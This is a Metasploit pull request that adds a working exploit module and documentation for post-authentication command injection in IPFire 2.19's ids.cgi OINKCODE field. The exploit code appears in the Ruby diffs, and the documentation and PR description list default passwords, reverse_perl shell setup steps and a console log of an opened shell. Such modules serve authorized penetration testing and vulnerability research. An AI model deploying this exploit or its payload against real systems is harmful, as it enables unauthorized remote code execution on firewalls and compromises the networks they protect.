### PR TITLE
Ipfire oinkcode exec

### DIFF
--- a/documentation/modules/exploit/linux/http/ipfire_oinkcode_exec.md
+++ b/documentation/modules/exploit/linux/http/ipfire_oinkcode_exec.md
@@ -1,0 +1,48 @@
+## Vulnerable Application
+
+  Official Source: [ipfire](http://downloads.ipfire.org/releases/ipfire-2.x/2.19-core110/ipfire-2.19.x86_64-full-core110.iso)
+
+This module has been verified against:
+
+1. 2.19 core 100
+2. 2.19 core 110 (exploit-db, not metasploit module)
+
+## Verification Steps
+
+  1. Install the firewall
+  2. Start msfconsole
+  3. Do: ```use exploit/linux/http/ipfire_oinkcode_exec```
+  4. Do: ```set password admin``` or whatever it was set to at install
+  5. Do: ```set rhost 10.10.10.10```
+  6. Do: ```set payload cmd/unix/reverse_perl```
+  7. Do: ```set lhost 192.168.2.229```
+  8. Do: ```exploit```
+  9. You should get a shell.
+
+## Options
+
+  **PASSWORD**
+
+  Password is set at install.  May be blank, 'admin', or 'ipfire'.
+
+## Scenarios
+
+  ```
+    msf > use exploit/linux/http/ipfire_oinkcode_exec 
+    msf exploit(ipfire_oinkcode_exec) > set password admin
+    password => admin
+    msf exploit(ipfire_oinkcode_exec) > set rhost 192.168.2.201
+    rhost => 192.168.2.201
+    msf exploit(ipfire_oinkcode_exec) > set verbose true
+    verbose => true
+    msf exploit(ipfire_oinkcode_exec) > check
+    [*] 192.168.2.201:444 The target appears to be vulnerable.
+    msf exploit(ipfire_oinkcode_exec) > exploit
+    
+    [*] Started reverse TCP handler on 192.168.2.117:4444 
+    [*] Command shell session 1 opened (192.168.2.117:4444 -> 192.168.2.201:38412) at 2017-06-14 21:12:21 -0400
+    id
+    uid=99(nobody) gid=99(nobody) groups=99(nobody),16(dialout),23(squid)
+    whoami
+    nobody
+  ```

--- a/modules/exploits/linux/http/ipfire_oinkcode_exec.rb
+++ b/modules/exploits/linux/http/ipfire_oinkcode_exec.rb
@@ -72,7 +72,7 @@ class MetasploitModule < Msf::Exploit::Remote
       end
 
       # now that we've pulled the info we need, check version.
-      if version && update && version.eql == '2.19' && update.to_i <= 110
+      if version && update && version == '2.19' && update.to_i <= 110
         CheckCode::Appears
       else
         CheckCode::Safe

--- a/modules/exploits/linux/http/ipfire_oinkcode_exec.rb
+++ b/modules/exploits/linux/http/ipfire_oinkcode_exec.rb
@@ -67,18 +67,20 @@ class MetasploitModule < Msf::Exploit::Remote
         'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
       )
 
-      if res and res.code == 200
+      if res && res.code == 200
         /\<strong\>IPFire (?<version>[\d.]{4}) \([\w]+\) - Core Update (?<update>[\d]+)/ =~ res.body
       end
-
-      # now that we've pulled the info we need, check version.
-      if version && update && version == '2.19' && update.to_i <= 110
+      if version.nil? || update.nil? || !Gem::Version.correct?(version)
+        vprint_error('No Recognizable Version Found')
+        CheckCode::Safe
+      elsif Gem::Version.new(version) <= Gem::Version.new('2.19') && update.to_i <= 110
         CheckCode::Appears
       else
+        vprint_error('Version and/or Update Not Supported')
         CheckCode::Safe
       end
-
     rescue ::Rex::ConnectionError
+      print_error("Connection Failed")
       CheckCode::Safe
     end
   end
@@ -97,20 +99,19 @@ class MetasploitModule < Msf::Exploit::Remote
             'Referer' => "#{datastore['SSL'] ? 'https' : 'http'}://#{datastore['RHOST']}:#{datastore['RPORT']}/cgi-bin/ids.cgi"
           },
         'vars_post'          => {
-            'ENABLE_SNORT_GREEN' => 'on',
-            'ENABLE_SNORT' => 'on',
-            'RULES' => 'registered',
-            'OINKCODE' => "`#{payload.encoded}`",
-            'ACTION' => 'Download new ruleset',
-            'ACTION2' => 'snort'
+          'ENABLE_SNORT_GREEN' => 'on',
+          'ENABLE_SNORT' => 'on',
+          'RULES' => 'registered',
+          'OINKCODE' => "`#{payload.encoded}`",
+          'ACTION' => 'Download new ruleset',
+          'ACTION2' => 'snort'
           }
       )
 
       # success means we hang our session, and wont get back a response, so just check we get a response back
-      if res  && res.code != 200
+      if res && res.code != 200
         fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})")
       end
-
     rescue ::Rex::ConnectionError
       fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
     end

--- a/modules/exploits/linux/http/ipfire_oinkcode_exec.rb
+++ b/modules/exploits/linux/http/ipfire_oinkcode_exec.rb
@@ -1,0 +1,111 @@
+##
+## This module requires Metasploit: http://metasploit.com/download
+## Current source: https://github.com/rapid7/metasploit-framework
+###
+
+class MetasploitModule < Msf::Exploit::Remote
+  include Msf::Exploit::Remote::HttpClient
+
+  Rank = ExcellentRanking
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'        => 'IPFire proxy.cgi RCE',
+        'Description' => %q(
+          IPFire, a free linux based open source firewall distribution,
+          version < 2.19 Update Core 110 contains a remote command execution
+          vulnerability in the ids.cgi page in the OINKCODE field.
+        ),
+        'Author'      =>
+          [
+            'h00die <mike@stcyrsecurity.com>', # module
+            '0x09AL'                         # discovery
+          ],
+        'References'  =>
+          [
+            [ 'EDB', '42149' ]
+          ],
+        'License'        => MSF_LICENSE,
+        'Platform'       => 'unix',
+        'Privileged'     => false,
+        'DefaultOptions' => { 'SSL' => true },
+        'Arch'           => [ ARCH_CMD ],
+        'Payload'        =>
+          {
+            'Compat' =>
+              {
+                'PayloadType' => 'cmd',
+                'RequiredCmd' => 'perl awk openssl'
+              }
+          },
+        'Targets'        =>
+          [
+            [ 'Automatic Target', {}]
+          ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => 'Jun 09 2016'
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('USERNAME', [ true, 'User to login with', 'admin']),
+        OptString.new('PASSWORD', [ false, 'Password to login with', '']),
+        Opt::RPORT(444)
+      ], self.class
+    )
+  end
+
+  def check
+    begin
+      res = send_request_cgi(
+        'uri'       => '/cgi-bin/pakfire.cgi',
+        'method'    => 'GET'
+      )
+      fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
+      fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code != 200
+      /\<strong\>IPFire (?<version>[\d.]{4}) \([\w]+\) - Core Update (?<update>[\d]+)/ =~ res.body
+
+      if version && update && version == "2.19" && update.to_i <= 110
+        Exploit::CheckCode::Appears
+      else
+        Exploit::CheckCode::Safe
+      end
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+    end
+  end
+
+  def exploit
+    begin
+
+      res = send_request_cgi(
+        'uri'           => '/cgi-bin/ids.cgi',
+        'method'        => 'POST',
+        'ctype'         => 'application/x-www-form-urlencoded',
+        'headers'       =>
+          {
+            'Referer' => "https://#{datastore['RHOST']}:#{datastore['RPORT']}/cgi-bin/ids.cgi"
+          },
+        'data'          => {
+            'ENABLE_SNORT_GREEN' => 'on',
+            'ENABLE_SNORT' => 'on',
+            'RULES' => 'registered',
+            'OINKCODE' => "`#{payload.encoded}`",
+            'ACTION' => 'Download new ruleset',
+            'ACTION2' => 'snort'
+          },
+      )
+
+      # success means we hang our session, and wont get back a response
+      if res
+        fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
+        fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code != 200
+      end
+
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+    end
+  end
+end

--- a/modules/exploits/linux/http/ipfire_oinkcode_exec.rb
+++ b/modules/exploits/linux/http/ipfire_oinkcode_exec.rb
@@ -44,7 +44,7 @@ class MetasploitModule < Msf::Exploit::Remote
             [ 'Automatic Target', {}]
           ],
         'DefaultTarget' => 0,
-        'DisclosureDate' => 'Jun 09 2016'
+        'DisclosureDate' => 'Jun 09 2017'
       )
     )
 
@@ -53,7 +53,7 @@ class MetasploitModule < Msf::Exploit::Remote
         OptString.new('USERNAME', [ true, 'User to login with', 'admin']),
         OptString.new('PASSWORD', [ false, 'Password to login with', '']),
         Opt::RPORT(444)
-      ], self.class
+      ]
     )
   end
 
@@ -62,18 +62,18 @@ class MetasploitModule < Msf::Exploit::Remote
       # authorization header required, see https://github.com/rapid7/metasploit-framework/pull/6433#r56764179
       # after a chat with @bcoles in IRC.
       res = send_request_cgi(
-        'uri'       => '/cgi-bin/pakfire.cgi',
-        'method'    => 'GET',
+        'uri'           => '/cgi-bin/pakfire.cgi',
+        'method'        => 'GET',
         'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
       )
       fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
       fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code != 200
       /\<strong\>IPFire (?<version>[\d.]{4}) \([\w]+\) - Core Update (?<update>[\d]+)/ =~ res.body
 
-      if version && update && version == "2.19" && update.to_i <= 110
-        Exploit::CheckCode::Appears
+      if version && update && version.eql? "2.19" && update.to_i <= 110
+        CheckCode::Appears
       else
-        Exploit::CheckCode::Safe
+        CheckCode::Safe
       end
     rescue ::Rex::ConnectionError
       fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
@@ -87,11 +87,10 @@ class MetasploitModule < Msf::Exploit::Remote
       res = send_request_cgi(
         'uri'           => '/cgi-bin/ids.cgi',
         'method'        => 'POST',
-        'ctype'         => 'application/x-www-form-urlencoded',
         'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
         'headers'       =>
           {
-            'Referer' => "https://#{datastore['RHOST']}:#{datastore['RPORT']}/cgi-bin/ids.cgi"
+            'Referer' => "#{datstore['SSL'] ? 'https' : 'http'}://#{datastore['RHOST']}:#{datastore['RPORT']}/cgi-bin/ids.cgi"
           },
         'vars_post'          => {
             'ENABLE_SNORT_GREEN' => 'on',
@@ -100,13 +99,14 @@ class MetasploitModule < Msf::Exploit::Remote
             'OINKCODE' => "`#{payload.encoded}`",
             'ACTION' => 'Download new ruleset',
             'ACTION2' => 'snort'
-          },
+          }
       )
 
       # success means we hang our session, and wont get back a response
       if res
-        fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
         fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code != 200
+      else
+        fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response")
       end
 
     rescue ::Rex::ConnectionError

--- a/modules/exploits/linux/http/ipfire_oinkcode_exec.rb
+++ b/modules/exploits/linux/http/ipfire_oinkcode_exec.rb
@@ -59,9 +59,12 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def check
     begin
+      # authorization header required, see https://github.com/rapid7/metasploit-framework/pull/6433#r56764179
+      # after a chat with @bcoles in IRC.
       res = send_request_cgi(
         'uri'       => '/cgi-bin/pakfire.cgi',
-        'method'    => 'GET'
+        'method'    => 'GET',
+        'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
       )
       fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
       fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code != 200
@@ -79,16 +82,18 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     begin
-
+      # authorization header required, see https://github.com/rapid7/metasploit-framework/pull/6433#r56764179
+      # after a chat with @bcoles in IRC.
       res = send_request_cgi(
         'uri'           => '/cgi-bin/ids.cgi',
         'method'        => 'POST',
         'ctype'         => 'application/x-www-form-urlencoded',
+        'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
         'headers'       =>
           {
             'Referer' => "https://#{datastore['RHOST']}:#{datastore['RPORT']}/cgi-bin/ids.cgi"
           },
-        'data'          => {
+        'vars_post'          => {
             'ENABLE_SNORT_GREEN' => 'on',
             'ENABLE_SNORT' => 'on',
             'RULES' => 'registered',

--- a/modules/exploits/linux/http/ipfire_oinkcode_exec.rb
+++ b/modules/exploits/linux/http/ipfire_oinkcode_exec.rb
@@ -66,17 +66,20 @@ class MetasploitModule < Msf::Exploit::Remote
         'method'        => 'GET',
         'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
       )
-      fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
-      fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code != 200
-      /\<strong\>IPFire (?<version>[\d.]{4}) \([\w]+\) - Core Update (?<update>[\d]+)/ =~ res.body
 
-      if version && update && version.eql? "2.19" && update.to_i <= 110
+      if res and res.code == 200
+        /\<strong\>IPFire (?<version>[\d.]{4}) \([\w]+\) - Core Update (?<update>[\d]+)/ =~ res.body
+      end
+
+      # now that we've pulled the info we need, check version.
+      if version && update && version.eql == '2.19' && update.to_i <= 110
         CheckCode::Appears
       else
         CheckCode::Safe
       end
+
     rescue ::Rex::ConnectionError
-      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+      CheckCode::Safe
     end
   end
 
@@ -84,13 +87,14 @@ class MetasploitModule < Msf::Exploit::Remote
     begin
       # authorization header required, see https://github.com/rapid7/metasploit-framework/pull/6433#r56764179
       # after a chat with @bcoles in IRC.
+      vprint_status('Sending request')
       res = send_request_cgi(
         'uri'           => '/cgi-bin/ids.cgi',
         'method'        => 'POST',
         'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
         'headers'       =>
           {
-            'Referer' => "#{datstore['SSL'] ? 'https' : 'http'}://#{datastore['RHOST']}:#{datastore['RPORT']}/cgi-bin/ids.cgi"
+            'Referer' => "#{datastore['SSL'] ? 'https' : 'http'}://#{datastore['RHOST']}:#{datastore['RPORT']}/cgi-bin/ids.cgi"
           },
         'vars_post'          => {
             'ENABLE_SNORT_GREEN' => 'on',
@@ -102,11 +106,9 @@ class MetasploitModule < Msf::Exploit::Remote
           }
       )
 
-      # success means we hang our session, and wont get back a response
-      if res
-        fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code != 200
-      else
-        fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response")
+      # success means we hang our session, and wont get back a response, so just check we get a response back
+      if res  && res.code != 200
+        fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})")
       end
 
     rescue ::Rex::ConnectionError


### PR DESCRIPTION
Super simplistic post-auth RCE based on https://www.exploit-db.com/exploits/42149/.  edb verified the py code as well.

This is more or less a copy and paste of the other 2 ipfire modules just w/ a changed cgi file and variables in the post request.

Also note auto-basic auth appears broken. @bcoles pointed it out in IRC, i made a comment to where he noted it in a PR.  I've included manual auth headers to fix it in the meantime and verified w/o them you get a 401, and with them it works.  

## Verification Steps

- [x]  Install the firewall
- [x]  Start msfconsole
- [x]  Do: ```use exploit/linux/http/ipfire_oinkcode_exec```
- [x]  Do: ```set password ``` or whatever it was set to at install
- [x]  Do: ```set rhost ```
- [x]  Do: ```set payload cmd/unix/reverse_perl```
- [x]  Do: ```set lhost ```
- [x]  Do: ```exploit```
- [x]  You should get a shell.
- [x]  check docs for issues.